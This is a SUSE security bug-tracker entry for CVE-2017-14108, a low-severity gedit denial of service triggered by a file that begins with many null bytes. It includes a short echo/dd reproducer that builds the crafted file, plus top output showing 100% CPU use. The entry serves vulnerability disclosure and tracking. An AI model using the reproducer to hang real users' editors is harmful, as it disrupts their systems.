Bug 1057184 (CVE-2017-14108)

Summary: VUL-1: CVE-2017-14108: gedit: CPU consumption via crafted file
Product: [Novell Products] SUSE Security Incidents Reporter: Alexander Bergmann <abergmann>
Component: IncidentsAssignee: Yifan Jiang <yfjiang>
Status: NEW --- QA Contact: Security Team bot <security-team>
Severity: Minor    
Priority: P4 - Low CC: smash_bz, yfjiang
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/191438/
Whiteboard: CVSSv2:SUSE:CVE-2017-14108:2.1:(AV:L/AC:L/Au:N/C:N/I:N/A:P) CVSSv3:SUSE:CVE-2017-14108:3.3:(AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L) maint:planned:update
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Alexander Bergmann 2017-09-05 09:41:56 UTC
rh#1488335
CVE-2017-14108

libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to
cause a denial of service (CPU consumption) via a file that begins with
many '\0' characters.

Reference:
https://cxsecurity.com/issue/WLB-2017090008

Reproducer:
#> echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
#> gedit craft.txt &

Now check for 100% CPU utilization.

#> top -b -n 1 | grep gedit
13724 abergma+  20   0  650968  51868  33560 R 100.0 0.317   0:38.66 gedit

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1488335
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14108
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14108